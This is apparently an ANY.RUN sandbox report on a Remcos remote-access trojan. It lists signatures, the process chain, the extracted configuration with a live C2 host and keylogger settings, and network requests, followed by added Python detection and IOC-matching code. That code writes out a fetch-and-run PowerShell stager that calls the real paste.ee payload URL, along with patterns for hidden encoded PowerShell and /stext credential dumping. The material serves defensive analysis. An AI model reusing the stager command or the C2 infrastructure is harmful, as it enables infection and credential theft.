URL:

https://files.catbox.moe/lpxom5.rar

Full analysis: https://app.any.run/tasks/75880550-4524-40ad-a925-27f1eb3d63d8
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are malware that gives an attacker full or partial control over an infected computer. They are often modular, offering a wide range of functions for carrying out illicit activity on a compromised system; common features include access to the user's data, webcam and keystrokes. RATs are typically distributed through phishing emails and links.

Analysis date: April 24, 2025, 08:53:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
rat
remcos
remote
stealer
mpress
Indicators:
MD5:

41763A61ACEE96D1256C3CD1706EB940

SHA1:

87D7F499F5F4CAD11BF6AC3D454D740738DA4AFD

SHA256:

7D07CF4C78AC33976B3CE20E4BF80C4221677EA2A412DE2505F0849A9101475D

SSDEEP:

3:N8MW3xKIQ4X:2MW55X

ANY.RUN is an interactive service which gives the analyst full access to the guest system. The information in this report may have been influenced by analyst actions and is provided as is, for the reader's information. ANY.RUN does not guarantee that the content is malicious or safe.
  • MALICIOUS

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 7748)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 7748)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 7748)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6816)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6816)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6816)
    • REMCOS mutex has been found

      • MSBuild.exe (PID: 7780)
    • REMCOS has been detected

      • MSBuild.exe (PID: 7780)
      • MSBuild.exe (PID: 7780)
    • REMCOS has been detected (SURICATA)

      • MSBuild.exe (PID: 7780)
    • Actions look like stealing of personal data

      • MSBuild.exe (PID: 924)
      • MSBuild.exe (PID: 2084)
    • Steals credentials from Web Browsers

      • MSBuild.exe (PID: 924)
    • REMCOS has been detected (YARA)

      • MSBuild.exe (PID: 7780)
  • SUSPICIOUS

    • Potential Corporate Privacy Violation

      • wscript.exe (PID: 7748)
      • powershell.exe (PID: 6816)
    • Base64-obfuscated command line is found

      • wscript.exe (PID: 7748)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7748)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 7748)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 7748)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 7748)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 7748)
    • Executes script without checking the security policy

      • powershell.exe (PID: 6816)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6816)
    • Reads security settings of Internet Explorer

      • MSBuild.exe (PID: 7780)
    • Connects to unusual port

      • MSBuild.exe (PID: 7780)
    • Application launched itself

      • MSBuild.exe (PID: 7780)
    • Contacting a server suspected of hosting a CnC

      • MSBuild.exe (PID: 7780)
    • There is functionality for taking screenshot (YARA)

      • MSBuild.exe (PID: 7780)
  • INFO

    • Application launched itself

      • chrome.exe (PID: 5216)
      • firefox.exe (PID: 7260)
      • firefox.exe (PID: 8176)
    • Manual execution by a user

      • firefox.exe (PID: 8176)
      • WinRAR.exe (PID: 8140)
      • notepad++.exe (PID: 8172)
      • wscript.exe (PID: 7748)
    • Reads the software policy settings

      • slui.exe (PID: 7304)
      • slui.exe (PID: 7424)
    • Checks proxy server information

      • wscript.exe (PID: 7748)
      • powershell.exe (PID: 6816)
      • MSBuild.exe (PID: 7780)
      • slui.exe (PID: 7424)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6816)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6816)
    • Disables trace logs

      • powershell.exe (PID: 6816)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6816)
    • Reads the computer name

      • MSBuild.exe (PID: 7780)
      • MSBuild.exe (PID: 8088)
      • MSBuild.exe (PID: 924)
      • MSBuild.exe (PID: 2084)
    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 7780)
      • MSBuild.exe (PID: 8088)
      • MSBuild.exe (PID: 924)
    • Checks supported languages

      • MSBuild.exe (PID: 7780)
      • MSBuild.exe (PID: 8088)
      • MSBuild.exe (PID: 924)
      • MSBuild.exe (PID: 2084)
    • Creates files or folders in the user directory

      • MSBuild.exe (PID: 7780)
    • Creates files in a temporary directory

      • MSBuild.exe (PID: 8088)
      • MSBuild.exe (PID: 924)
      • MSBuild.exe (PID: 2084)
    • Creates files in the program directory

      • MSBuild.exe (PID: 7780)
    • Mpress packer has been detected

      • MSBuild.exe (PID: 7780)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
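The signature list above describes the loader chain in the order the sandbox saw it: a manually started wscript.exe spawns a hidden, profile-less PowerShell with a base64-encoded command that fetches the next stage over HTTP (the paste.ee URL in the HTTP table below), loads a .NET assembly in memory, and ends with MSBuild.exe hosting Remcos, which in turn spawns further MSBuild.exe children with a /stext argument for credential dumping. The Python below is an added example, not ANY.RUN's code or anything from the sample: it encodes those parent/child relationships as three process-creation rules and runs them over constructed Sysmon-style events, and decodes the -EncodedCommand payload the way an analyst would. The script file name, the exact stager command and the benign developer event are assumptions; the PIDs, parent links and MSBuild command lines follow the report.

```python
"""Added example, not part of the ANY.RUN report: scores Sysmon-style
process-creation events against the loader chain the signatures above
describe (wscript.exe -> hidden, encoded PowerShell -> MSBuild.exe hosting
Remcos -> MSBuild.exe /stext for credential dumping)."""
import base64
import re

# Constructed stager text: the report shows only the URL and the IEX/download
# signatures, so the exact command is an assumption.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://paste.ee/d/jMxTnyJf/0')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode()

# Constructed events modelled on the report's process tree.  PIDs and parent
# links follow the report; the script file name is a placeholder.
EVENTS = [
    {"pid": 7748, "ppid": 8140, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\admin\Desktop\extracted\script.js"'},
    {"pid": 6816, "ppid": 7748,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
            "-EncodedCommand " + ENCODED_STAGER},
    {"pid": 7780, "ppid": 6816,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmd": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
    {"pid": 924, "ppid": 7780,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmd": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext '
            r'"C:\Users\admin\AppData\Local\Temp\vabqwvogjezzjfddtsjuxykyxj"'},
    # Benign developer build (constructed): must not trigger the MSBuild rules.
    {"pid": 4100, "ppid": 3000, "image": r"C:\Program Files\dotnet\MSBuild.exe",
     "cmd": r"MSBuild.exe C:\src\app\app.csproj /t:Build /p:Configuration=Release"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
PROJECT_ARG = re.compile(r"\.(?:proj|csproj|vbproj|sln|targets)\b", re.I)
STEXT = re.compile(r"(?:^|\s)/stext\s", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd):
    """Return the plaintext of a -EncodedCommand payload (UTF-16LE), or None."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(events):
    """Return (pid, rule, detail) tuples for events matching the chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""
        cmd = e["cmd"]
        # Rule 1: a script host launches PowerShell with a hidden window, a
        # policy bypass or an encoded command ("Run PowerShell with an
        # invisible window", "Base64-obfuscated command line" in the report).
        if img in PS_HOSTS and pimg in SCRIPT_HOSTS:
            flags = [name for name, rx in (("hidden", HIDDEN), ("bypass", BYPASS),
                                            ("encoded", ENCODED)) if rx.search(cmd)]
            if flags:
                hits.append((e["pid"], "script_host_spawns_obfuscated_powershell",
                             ",".join(flags)))
        # Rule 2: PowerShell starts MSBuild.exe with no project file, i.e. the
        # binary is used as a host for injected code, not as a build tool.
        if img == "msbuild.exe" and pimg in PS_HOSTS and not PROJECT_ARG.search(cmd):
            hits.append((e["pid"], "powershell_spawns_msbuild_without_project", cmd))
        # Rule 3: MSBuild.exe spawns MSBuild.exe with /stext <file>, the
        # save-to-text switch of NirSoft-style recovery tools, consistent
        # with the "Steals credentials from Web Browsers" signature.
        if img == "msbuild.exe" and pimg == "msbuild.exe" and STEXT.search(cmd):
            hits.append((e["pid"], "msbuild_self_spawn_stext", cmd))
    return hits


if __name__ == "__main__":
    for pid, rule, detail in evaluate(EVENTS):
        print(f"{pid}\t{rule}\t{detail[:80]}")
    print(decode_encoded_command(EVENTS[1]["cmd"]))
```

Rule 2 is the one worth tuning in a real estate: MSBuild.exe started by PowerShell is normal on build agents, so the "no project file on the command line" condition, or an allow-list of build hosts, is what keeps it from firing constantly.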

Remcos

Process: MSBuild.exe (PID 7780)
C2 (1): wizz111.duckdns.org:31688
Botnet: APRILL
Options
Connect_interval: 1
Install_flag: False
Install_HKCU\Run: True
Install_HKLM\Run: True
Install_HKLM\Explorer\Run: 1
Setup_path: %LOCALAPPDATA%
Copy_file: remcos.exe
Startup_value: Remcos
Hide_file: False
Mutex_name: Rmc-P9USOJ
Keylog_flag: 1
Keylog_path: %LOCALAPPDATA%
Keylog_file: logs.dat
Keylog_crypt: False
Hide_keylog: False
Screenshot_flag: False
Screenshot_time: 5
Take_Screenshot: False
Screenshot_path: %APPDATA%
Screenshot_file: Screenshots
Screenshot_crypt: False
Mouse_option: False
Delete_file: False
Audio_record_time: 5
Audio_path: %ProgramFiles%
Audio_dir: MicRecords
Connect_delay: 0
Copy_dir: Remcos
Keylog_dir: remcos
Max_keylog_file: 100000
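Read as a practitioner, the configuration says: C2 at wizz111.duckdns.org:31688, keylogging enabled to %LOCALAPPDATA%\remcos\logs.dat in clear text, mutex Rmc-P9USOJ, and autorun values named "Remcos" under the HKCU and HKLM Run keys pointing at %LOCALAPPDATA%\Remcos\remcos.exe. Note that Install_flag is False, so the copy-and-autorun step is switched off in this build, which fits the absence of any Run-key write by MSBuild.exe in the signature list. The Python below is an added example, not part of the report or the sample: it derives these artefacts from the configuration and checks them against a constructed host inventory. The environment-variable expansion, the mapping of the Install_* options to registry keys, and the inventory contents are assumptions.

```python
"""Added example, not part of the ANY.RUN report: derives host indicators from
the Remcos configuration extracted above and checks a constructed host
inventory against them."""
import ntpath

# Values as extracted by the sandbox; key names are the report's own labels.
REMCOS_CFG = {
    "C2": "wizz111.duckdns.org:31688",
    "Botnet": "APRILL",
    "Install_flag": "False",
    "Install_HKCU\\Run": "True",
    "Install_HKLM\\Run": "True",
    "Install_HKLM\\Explorer\\Run": "1",
    "Setup_path": "%LOCALAPPDATA%",
    "Copy_dir": "Remcos",
    "Copy_file": "remcos.exe",
    "Startup_value": "Remcos",
    "Mutex_name": "Rmc-P9USOJ",
    "Keylog_flag": "1",
    "Keylog_path": "%LOCALAPPDATA%",
    "Keylog_dir": "remcos",
    "Keylog_file": "logs.dat",
}

# Assumed expansion for the sandbox user "admin"; a live triage script would
# read the real environment instead.
ENV = {
    "%LOCALAPPDATA%": r"C:\Users\admin\AppData\Local",
    "%APPDATA%": r"C:\Users\admin\AppData\Roaming",
    "%ProgramFiles%": r"C:\Program Files",
}

# Assumed mapping from the config's Install_* options to registry keys.
RUN_KEYS = {
    "Install_HKCU\\Run": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    "Install_HKLM\\Run": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    "Install_HKLM\\Explorer\\Run":
        r"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
}


def truthy(value):
    return str(value).strip().lower() in ("true", "1")


def expand(template):
    for var, val in ENV.items():
        template = template.replace(var, val)
    return template


def derive_iocs(cfg):
    """Turn the configuration into concrete paths, Run values, mutex and C2."""
    host, port = cfg["C2"].rsplit(":", 1)
    install_path = ntpath.join(expand(cfg["Setup_path"]), cfg["Copy_dir"], cfg["Copy_file"])
    keylog_path = ntpath.join(expand(cfg["Keylog_path"]), cfg["Keylog_dir"], cfg["Keylog_file"])
    iocs = {"c2_host": host, "c2_port": int(port), "mutex": cfg["Mutex_name"],
            "files": [], "registry": []}
    # Install_flag gates the copy-to-Setup_path and autorun step.  In this
    # sample it is False, so the Run-key options are configured but not
    # expected to be written; the derived values are still useful hunt terms.
    if truthy(cfg["Install_flag"]):
        iocs["files"].append(install_path)
        for option, key in RUN_KEYS.items():
            if truthy(cfg.get(option, "False")):
                iocs["registry"].append((key, cfg["Startup_value"], install_path))
    if truthy(cfg["Keylog_flag"]):
        iocs["files"].append(keylog_path)
    return iocs


# Constructed inventory in the shape a triage collector might return.
INVENTORY = {
    "files": [r"C:\Users\admin\AppData\Local\remcos\logs.dat",
              r"C:\Users\admin\AppData\Local\Temp\vabqwvogjezzjfddtsjuxykyxj"],
    "mutexes": ["Rmc-P9USOJ", r"Local\MSCTF.Asm.MutexDefault1"],
    "run_values": {r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run":
                   {"OneDrive": r"C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"}},
    "connections": [("MSBuild.exe", "wizz111.duckdns.org", 31688)],
}


def match_inventory(iocs, inv):
    """Return (kind, detail) findings; Windows paths compare case-insensitively."""
    findings = []
    present = {f.lower() for f in inv["files"]}
    for f in iocs["files"]:
        if f.lower() in present:
            findings.append(("file", f))
    if iocs["mutex"] in inv["mutexes"]:
        findings.append(("mutex", iocs["mutex"]))
    for key, name, _ in iocs["registry"]:
        if name in inv["run_values"].get(key, {}):
            findings.append(("registry", key + "\\" + name))
    for proc, host, port in inv["connections"]:
        if host.lower() == iocs["c2_host"].lower() or port == iocs["c2_port"]:
            findings.append(("network", f"{proc} -> {host}:{port}"))
    return findings


if __name__ == "__main__":
    for kind, detail in match_inventory(derive_iocs(REMCOS_CFG), INVENTORY):
        print(kind, detail)
```

Because the keylog directory ("remcos") and the copy directory ("Remcos") differ only in case, the file comparison is deliberately case-insensitive; a case-sensitive match would miss the log file on a real NTFS volume.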
All screenshots are available in the full report
Total processes: 166
Monitored processes: 35
Malicious processes: 5
Suspicious processes: 0

Behavior graph

Processes in the graph ("no specs" marks a process with no recorded indicators): start, chrome.exe, chrome.exe (no specs) ×2, chrome.exe, chrome.exe (no specs) ×5, sppextcomobj.exe (no specs), slui.exe, chrome.exe (no specs), firefox.exe (no specs), firefox.exe, firefox.exe (no specs) ×8, rundll32.exe (no specs), winrar.exe (no specs), notepad++.exe (no specs), slui.exe, wscript.exe, powershell.exe, conhost.exe (no specs), #REMCOS msbuild.exe, msbuild.exe (no specs), msbuild.exe, msbuild.exe, msbuild.exe (no specs), svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID:
812
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.0.6261.70 --initial-client-data=0x1fc,0x220,0x224,0x1e0,0x228,0x7ffc8839dc40,0x7ffc8839dc4c,0x7ffc8839dc58
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID:
924
CMD:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\admin\AppData\Local\Temp\vabqwvogjezzjfddtsjuxykyxj"
Path:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Parent process:
MSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\user32.dll
PID:
976
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgABAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1164 --field-trial-handle=1808,i,4274788144423769535,7092802509947169584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:2
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID:
1012
CMD:
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1912 -parentBuildID 20240213221259 -prefsHandle 1848 -prefMapHandle 1840 -prefsLen 31031 -prefMapSize 244583 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2e9fee4-ab5d-4eb7-be42-c218c1f94450} 7260 "\\.\pipe\gecko-crash-server-pipe.7260" 1f9bacee810 gpu
Path:
C:\Program Files\Mozilla Firefox\firefox.exe
Parent process:
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
1
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
c:\windows\system32\crypt32.dll
PID:
1804
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1808,i,4274788144423769535,7092802509947169584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:1
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID:
2084
CMD:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\admin\AppData\Local\Temp\xugjxnzzfmretlrhccewidxhgpmwro"
Path:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Parent process:
MSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\rpcrt4.dll
PID:
2092
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
2196
CMD:
C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path:
C:\Windows\System32\svchost.exe
Parent process:
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID:
2432
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=2204 --field-trial-handle=1808,i,4274788144423769535,7092802509947169584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID:
3032
CMD:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\admin\AppData\Local\Temp\vabqwvogjezzjfddtsjuxykyxj"
Path:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Parent process:
MSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
Total events: 23 345
Read events: 23 327
Write events: 17
Delete events: 1

Modification events

Process: chrome.exe (PID 5216)
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation: write
Name: failed_count
Value: 0

Process: chrome.exe (PID 5216)
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation: write
Name: state
Value: 2

Process: chrome.exe (PID 5216)
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation: write
Name: state
Value: 1

Process: chrome.exe (PID 5216)
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation: write
Name: user_experience_metrics.stability.exited_cleanly
Value: 0

Process: chrome.exe (PID 5216)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation: write
Name: usagestats
Value: 0

Process: chrome.exe (PID 5216)
Key: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation: write
Name: user_experience_metrics.stability.exited_cleanly
Value: 1

Process: chrome.exe (PID 5216)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: delete value
Name: GoogleChromeAutoLaunch_A822CA3D40D4B8944864CFEA751D8D57
Value: (none)

Process: firefox.exe (PID 7260)
Key: HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\DllPrefetchExperiment
Operation: write
Name: C:\Program Files\Mozilla Firefox\firefox.exe
Value: 0

Process: WinRAR.exe (PID 8140)
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

Process: WinRAR.exe (PID 8140)
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80
Executable files: 0
Suspicious files: 199
Text files: 52
Unknown types: 3

Dropped files

PID | Process | Filename (type, MD5 and SHA256 are not listed in this excerpt)
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF10d5b1.TMP
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RF10d5c0.TMP
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF10d5c0.TMP
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old~RF10d5c0.TMP
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old~RF10d5c0.TMP
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old~RF10d5c0.TMP
5216 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old
Download the PCAP and analyze network streams, HTTP content and more in the full report
HTTP(S) requests: 18
TCP/UDP connections: 76
DNS requests: 105
Threats: 15

HTTP requests

(Type and Size are empty for every row in this excerpt; one row has no PID or process attributed.)

PID  | Process     | Method | HTTP Code | IP                 | URL                                                                     | CN      | Reputation
7260 | firefox.exe | GET    | 200       | 34.107.221.82:80   | http://detectportal.firefox.com/canonical.html                          | unknown | whitelisted
7260 | firefox.exe | POST   | 200       | 142.250.181.227:80 | http://o.pki.goog/we2                                                   | unknown | whitelisted
7260 | firefox.exe | GET    | 200       | 34.107.221.82:80   | http://detectportal.firefox.com/success.txt?ipv4                        | unknown | whitelisted
7260 | firefox.exe | POST   | 200       | 184.24.77.74:80    | http://r11.o.lencr.org/                                                 | unknown | whitelisted
7260 | firefox.exe | POST   | 200       | 142.250.181.227:80 | http://o.pki.goog/s/wr3/FIY                                             | unknown | whitelisted
7260 | firefox.exe | POST   | 200       | 184.24.77.74:80    | http://r11.o.lencr.org/                                                 | unknown | whitelisted
–    | –           | GET    | 200       | 23.48.23.156:80    | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
7748 | wscript.exe | GET    | 301       | 23.186.113.60:80   | http://paste.ee/d/jMxTnyJf/0                                            | unknown | shared
7260 | firefox.exe | POST   | 200       | 184.24.77.65:80    | http://r10.o.lencr.org/                                                 | unknown | whitelisted
7780 | MSBuild.exe | GET    | 200       | 178.237.33.50:80   | http://geoplugin.net/json.gp                                            | unknown | whitelisted

Connections

PID  | Process     | IP                   | Domain                 | ASN                        | CN | Reputation
–    | –           | 4.231.128.59:443     | –                      | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
–    | –           | 23.48.23.156:80      | crl.microsoft.com      | Akamai International B.V.  | DE | whitelisted
